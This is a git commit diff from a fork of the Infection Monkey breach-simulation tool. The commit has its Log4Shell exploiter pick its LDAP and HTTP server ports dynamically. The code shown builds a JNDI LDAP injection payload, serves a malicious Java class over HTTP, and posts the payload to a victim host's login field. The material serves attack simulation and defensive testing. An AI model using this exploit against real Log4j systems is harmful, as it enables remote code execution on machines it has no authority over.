forked from p15670423/monkey
Agent: change ldap and http ports to be chosen dynamically in log4shell
This commit is contained in:
vakarisz
parent
0659fddac6
commit
8a120110f5
|
|
@ -19,6 +19,7 @@ from infection_monkey.model import (
|
||||||
MONKEY_ARG,
|
MONKEY_ARG,
|
||||||
VictimHost,
|
VictimHost,
|
||||||
)
|
)
|
||||||
|
from infection_monkey.network.info import get_free_tcp_port
|
||||||
from infection_monkey.network.tools import get_interface_to_target
|
from infection_monkey.network.tools import get_interface_to_target
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
from infection_monkey.utils.commands import build_monkey_commandline
|
||||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||||
|
|
@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
||||||
_EXPLOITED_SERVICE = "Log4j"
|
_EXPLOITED_SERVICE = "Log4j"
|
||||||
LDAP_PORT = 8080
|
|
||||||
CLASS_HTTP_SERVER_PORT = 1337
|
|
||||||
DOWNLOAD_TIMEOUT = 15
|
DOWNLOAD_TIMEOUT = 15
|
||||||
|
|
||||||
def __init__(self, host: VictimHost):
|
def __init__(self, host: VictimHost):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
self._client = None
|
self._client = None
|
||||||
|
self.ldap_port = get_free_tcp_port()
|
||||||
|
self.class_http_server_port = get_free_tcp_port()
|
||||||
|
|
||||||
def exploit_host(self):
|
def exploit_host(self):
|
||||||
|
|
||||||
|
|
@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE):
|
||||||
java_class = self.build_java_class(command)
|
java_class = self.build_java_class(command)
|
||||||
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
|
|
||||||
java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread(
|
java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
|
||||||
class_http_server_ip, java_class
|
|
||||||
)
|
|
||||||
java_class_http_thread.start()
|
java_class_http_thread.start()
|
||||||
|
|
||||||
ldap = LDAPExploitServer(
|
ldap = LDAPExploitServer(
|
||||||
ldap_server_port=Log4ShellExploiter.LDAP_PORT,
|
ldap_server_port=self.ldap_port,
|
||||||
http_server_ip=class_http_server_ip,
|
http_server_ip=class_http_server_ip,
|
||||||
http_server_port=self.CLASS_HTTP_SERVER_PORT,
|
http_server_port=self.class_http_server_port,
|
||||||
storage_dir=get_monkey_dir_path(),
|
storage_dir=get_monkey_dir_path(),
|
||||||
)
|
)
|
||||||
ldap_thread = ldap.get_run_thread()
|
ldap_thread = ldap.get_run_thread()
|
||||||
|
|
@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
|
|
||||||
def build_ldap_payload(self):
|
def build_ldap_payload(self):
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
||||||
|
|
||||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||||
def build_command(self, path, http_path):
|
def build_command(self, path, http_path):
|
||||||
|
|
@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE):
|
||||||
self.wfile.write(self.java_class)
|
self.wfile.write(self.java_class)
|
||||||
Log4ShellExploiter.HTTPHandler.class_downloaded = True
|
Log4ShellExploiter.HTTPHandler.class_downloaded = True
|
||||||
|
|
||||||
@staticmethod
|
def _run_class_http_server(self, ip):
|
||||||
def _run_class_http_server(ip):
|
server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler)
|
||||||
|
|
||||||
server = http.server.HTTPServer(
|
|
||||||
(ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler
|
|
||||||
)
|
|
||||||
while (
|
while (
|
||||||
not Log4ShellExploiter.HTTPHandler.class_downloaded
|
not Log4ShellExploiter.HTTPHandler.class_downloaded
|
||||||
and not Log4ShellExploiter.HTTPHandler.stop
|
and not Log4ShellExploiter.HTTPHandler.stop
|
||||||
):
|
):
|
||||||
server.handle_request()
|
server.handle_request()
|
||||||
|
|
||||||
@staticmethod
|
def get_java_class_server_thread(self, ip: str, java_class: bytes):
|
||||||
def get_java_class_server_thread(ip: str, java_class: bytes):
|
|
||||||
Log4ShellExploiter.HTTPHandler.java_class = java_class
|
Log4ShellExploiter.HTTPHandler.java_class = java_class
|
||||||
|
|
||||||
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip])
|
return Thread(target=self._run_class_http_server, args=[ip])
|
||||||
|
|
|
||||||
|
|
@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
|
||||||
payload = {"uname": payload, "password": "m0nk3y"}
|
payload = {"uname": payload, "password": "m0nk3y"}
|
||||||
for url in urls:
|
for url in urls:
|
||||||
try:
|
try:
|
||||||
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||||
except requests.ReadTimeout:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug("Couldn't send request to the vulnerable machine")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
||||||
|
|
||||||
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
|
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue